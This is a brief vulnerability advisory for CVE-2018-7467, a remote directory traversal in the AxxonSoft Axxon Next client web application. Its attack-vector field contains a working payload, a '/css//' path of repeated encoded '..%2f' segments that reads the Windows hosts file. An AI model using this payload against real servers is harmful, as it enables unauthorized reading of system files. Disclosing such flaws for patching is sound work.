AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
d35bb1a5d3f761c3ff0d4cfa73dd81a7c335da6fabac0fea007e4f5814a538e4
Title
AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial
/css//..%2f substring in a URI. CVE-2018-7467
[Vulnerability Type]
Directory Traversal via an initial /css//..%2f substring in a URI
[Vendor of Product]
AxxonSoft Client
[Affected Product Code Base]
Axxon Next
[Affected Component]
AxxonSoft Client Web Application's Source Code
[Attack Type]
Remote
[Impact Information Disclosure]
true
[Attack Vectors]
It is a Directory Traversal
/css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts
[Discoverer]
Martin A Cicalla Jr